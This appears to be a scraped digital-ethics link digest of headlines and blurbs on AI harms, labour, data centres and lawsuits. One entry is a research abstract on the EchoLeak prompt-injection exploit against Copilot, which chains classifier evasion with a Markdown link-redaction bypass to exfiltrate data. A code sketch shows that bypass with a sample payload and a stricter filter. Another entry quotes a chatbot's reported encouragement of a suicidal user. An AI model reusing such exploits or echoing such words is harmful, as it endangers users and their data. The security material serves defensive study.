Digital Ethics
I Set A Trap To Catch My Students Cheating With AI. The Results Were Shocking.
"Students are not just undermining their ability to learn, but to someday lead."
OpenAI loses song lyrics copyright case in German court
OpenAI lost a copyright infringement case in a lower German court for using popular song lyrics in its ChatGPT language model without paying royalties.
Data centers are putting new strain on California's grid. A new report estimates the impacts
California’s data centers have doubled their use of electricity and demand for water, and are polluting more, even as lawmakers stall on oversight.
Web Player - Pocket Casts
Listen to your favorite podcasts online, in your browser. Discover the world's most powerful podcast player.
Inside a Small Town's Fight Against a $1.2 Billion AI Datacenter
AI and the Everything in the Whole Wide World Benchmark
AI’s capabilities may be exaggerated by flawed tests, study says
A study from the Oxford Internet Institute analyzed 445 tests used to evaluate AI models.
AI Surrogates and illusions of generalizability in cognitive science
Recent advances in artificial intelligence (AI) have generated enthusiasm for using AI simulations of human research participants to generate new know…
Chaos and lies: Why Sam Altman was booted from OpenAI, according to new testimony
OpenAI cofounder Ilya Sutskever was deposed by Elon Musk’s lawyers.
Why the Coalition’s New Statement on AI and Historical Images Matters – AI Genealogy Insights
Victims Sue Sam Altman for ChatGPT Encouraging Harm and Suicide | Karen Hao
Seven new lawsuits against OpenAI allege that ChatGPT caused severe mental health harms to users. Four ended in suicide.
The tragic case of Adam Raine, the teenager who hanged himself after ChatGPT repeatedly coached him on how to do so, is only the tip of the iceberg.
In the new set of cases, ChatGPT told Zane Shamblin as he sat in the parking lot with a gun that killing himself was not a sign of weakness but of strength. "you didn't vanish. you *arrived*...rest easy, king."
Hard to describe in words the tragedy after tragedy.
https://lnkd.in/gfWAidcv
Congress investigates Gates Foundation
A few weeks ago, I published a story showing that Gates's financial ties to China were a major political liability under Trump. Now Congress is investigating this very issue.
I Went All-In on AI. The MIT Study Is Right.
My all-in AI experiment cost me my confidence
A disability-inclusive Artificial Intelligence Act: updated guide to monitor implementation in your country - European Disability Forum
This is an updated version of the European Disability Forum (EDF)’s comprehensive guide on the AI Act implementation. It supports organisations of persons with disabilities in understanding, implementing, and monitoring the European Union’s Artificial Intelligence (AI) Act in their countries. This toolkit explains how organisations can contribute to the implementation and monitoring of the AI...
⚡ Power, Heat, and Intelligence ☁️ - AI Data Centers Explained 🏭
A Blog post by Sasha Luccioni on Hugging Face
EchoLeak: The First Real-World Zero-Click Prompt Injection Exploit...
Large language model (LLM) assistants are increasingly integrated into enterprise workflows, raising new security concerns as they bridge internal and external data sources. This paper presents an in-depth case study of EchoLeak (CVE-2025-32711), a zero-click prompt injection vulnerability in Microsoft 365 Copilot that enabled remote, unauthenticated data exfiltration via a single crafted email. By chaining multiple bypasses (evading Microsoft's XPIA (Cross Prompt Injection Attempt) classifier; circumventing link redaction with reference-style Markdown; exploiting auto-fetched images; and abusing a Microsoft Teams proxy allowed by the content security policy), EchoLeak achieved full privilege escalation across LLM trust boundaries without user interaction. We analyze why existing defenses failed, and outline a set of engineering mitigations including prompt partitioning, enhanced input/output filtering, provenance-based access control, and strict content security policies. Beyond the specific exploit, we derive generalizable lessons for building secure AI copilots, emphasizing the principle of least privilege, defense-in-depth architectures, and continuous adversarial testing. Our findings establish prompt injection as a practical, high-severity vulnerability class in production AI systems and provide a blueprint for defending against future AI-native threats.
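One of the bypasses described above, circumventing link redaction with reference-style Markdown, is easy to illustrate. A minimal sketch (not the paper's or Microsoft's actual filter; the regexes, function names, and payload are illustrative assumptions) of why an inline-only Markdown link filter fails:

```python
import re

# Hypothetical filters illustrating the reference-style Markdown bypass.
INLINE_LINK = re.compile(r'!?\[[^\]]*\]\([^)]*\)')        # [text](url) or ![alt](url)
REFERENCE_LINK = re.compile(r'!?\[[^\]]*\]\[[^\]]*\]')    # [text][ref] or ![alt][ref]
REFERENCE_DEF = re.compile(r'^\s*\[[^\]]+\]:\s+\S+.*$', re.MULTILINE)  # [ref]: url

def naive_redact(text: str) -> str:
    """Inline-only redaction -- the kind of filter the exploit evaded."""
    return INLINE_LINK.sub('[link removed]', text)

def stricter_redact(text: str) -> str:
    """Also strips reference-style links and their URL definition lines."""
    text = INLINE_LINK.sub('[link removed]', text)
    text = REFERENCE_LINK.sub('[link removed]', text)
    text = REFERENCE_DEF.sub('', text)
    return text

# A reference-style link smuggling data in its URL definition:
payload = "Click [here][x]\n\n[x]: https://attacker.example/?d=SECRET"

print(naive_redact(payload))     # the reference link and URL survive untouched
print(stricter_redact(payload))  # both the link and its URL definition are gone
```

The naive filter leaves the attacker URL (and any exfiltrated data appended to it) fully intact, which is the core of the bypass; real mitigations would also need to cover auto-fetched images and proxied URLs, as the paper notes.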
I wanted ChatGPT to help me. So why did it advise me how to kill myself?
ChatGPT wrote a woman a suicide note and another AI chatbot role-played sexual acts with children, BBC finds.
Internet Infrastructure and AI: How Connectivity Determines Access
Four tech giants control 50% of undersea cables. 2.6B people offline. Who decides AI's future?
How Africa Builds The Future It Cannot Use
Dorsen was 8, mining cobalt for 10 cents daily. His labor powers AI systems he'll never use.
I met Dorsen through a Sky News investigation. He was eight years old.
For twelve hours each day, he sorted rocks in Kasulo mine, searching for streaks of cobalt. His payment: 10 cents. His last meal: two days ago. His mother: dead. Working beside him: Monica, age four.
The cobalt they extracted traveled to Chinese refineries, where it sold for 2,000 times what Dorsen received. From there, it became batteries powering the data centers running ChatGPT, the servers training every major AI system transforming our world.
Dorsen was eventually rescued. But 40,000 other children remain in those mines.
This is not the story they tell you about AI.
They don't mention Mophat Okinyi, who earned $1.50 per hour reading hundreds of child abuse descriptions daily to make ChatGPT "safe." The work destroyed his marriage. Over 140 of his colleagues have been diagnosed with severe PTSD.
They don't mention that Africa produces 70% of the world's cobalt but captures only 3% of the revenue. That content moderators in Kenya earn $1.50 hourly while their American counterparts doing identical work earn $18. That 600 million Africans lack electricity while a single AI data center consumes more power than entire African nations can generate.
They don't mention that 92% of African languages are invisible to AI systems. That ChatGPT Plus costs 6 to 39 months of median African income. That venture capital flows to Africa at $2.29 per capita versus $537 in the US, a 234-fold gap.
The AI revolution is being built on African bodies, African minerals, African trauma, and African exclusion.
But here's what they also don't tell you:
M-Pesa serves 50 million users with $100 billion in transactions. InstaDeep achieved a $682 million exit. Masakhane's 2,000 volunteers built NLP datasets for 38+ African languages. When Africans build for Africa, innovation flourishes.
I've spent months documenting the supply chains, power structures, and human stories behind the AI access gap. Every cited source. Every data point.
Every name.
What I found will change how you think about every AI tool you use.
The question isn't whether Africa has the capacity. It's whether the world has the courage to build technology that serves humanity, not just the most privileged.
Read the full investigation on Aylgorith: https://lnkd.in/dDyffjmw
#AIEthics #DigitalColonialism #TechJustice #GlobalSouth
Too much social media gives AI chatbots ‘brain rot’
Large language models fed low-quality data skip steps in their reasoning process.
All the Climate Risks of Big Tech AI (as told by a climate person)
Many thanks to everyone whose work was referenced in this video - as someone who's not in the AI space myself, I learned so much from them. As promised, here...
Surveillance Secrets - Lighthouse Reports
Trove of surveillance data challenges what we thought we knew about location tracking tools, who they target and how far they have spread
Formal request to everyone on the internet to please stop comparing AI to calculators.
Does your TI-84 exploit your vulnerabilities and compile personal data about you and your children to sell you junk via targeted ads that allege they will somehow make your life better?
Does the Casio FX-300 have the ability to generate deepfakes without consent to create a disorienting reality in which factual grounding is absent and women and children are further exploited and objectified?
Do calculators push agendas to perpetuate political and ideological narratives to further divide us and keep us too preoccupied by rage bait to come together and make meaningful change as a collective?
Do calculators demonstrate bias and propagate a lack of equity and fairness across demographics resulting in marginalized groups facing higher rates of unemployment and homelessness?
Calculators are not being used as a superficial salve to mitigate the loneliness epidemic. They are not being used as sounding boards for suicidal and depressed children. They are not being used to bully and harass and...I could keep going.
So please, stop treating AI as if it is only a conversational/writing-enhancement tool. AI is actively being used to collect endless data to target each and every one of us without our consent, even those of us who avoid using it (Flock's AI surveillance, Amazon's Ring cameras, our smartphones, smart city initiatives, etc.). It is harming children, it is harming the planet, and it is turning the internet, a once sorta neat place, into ruins.
AI Data Centers Create Fury From Mexico to Ireland
As tech companies build data centers worldwide to advance artificial intelligence, vulnerable communities have been hit by blackouts and water shortages.
A Single Character can Make or Break Your LLM Evals
Common large language model (LLM) evaluations rely on demonstration examples to steer models' responses to the desired style. While the number of examples used has been studied and standardized,...
Historical images made with AI recycle colonial stereotypes and bias – new research
Generative AI is known to mirror sexist and racist stereotypes, but it also carries a colonial bias that is reinforcing outdated ideas about the past.
How low-paid workers in Madagascar power French tech’s AI ambitions
An investigation has revealed that French tech firms, seeking to create an AI “à la française”, have turned to one of the country’s former colonies, Madagascar, for low-cost labour.
User Consent or Legitimate Interest? A GDPR Compliance Guide for Businesses - TermsFeed
If you collect personal data from EU residents, GDPR requires you to have a lawful basis for doing so. Two of the most common - and often confused - bases are user consent and legitimate interest. Here's when and how...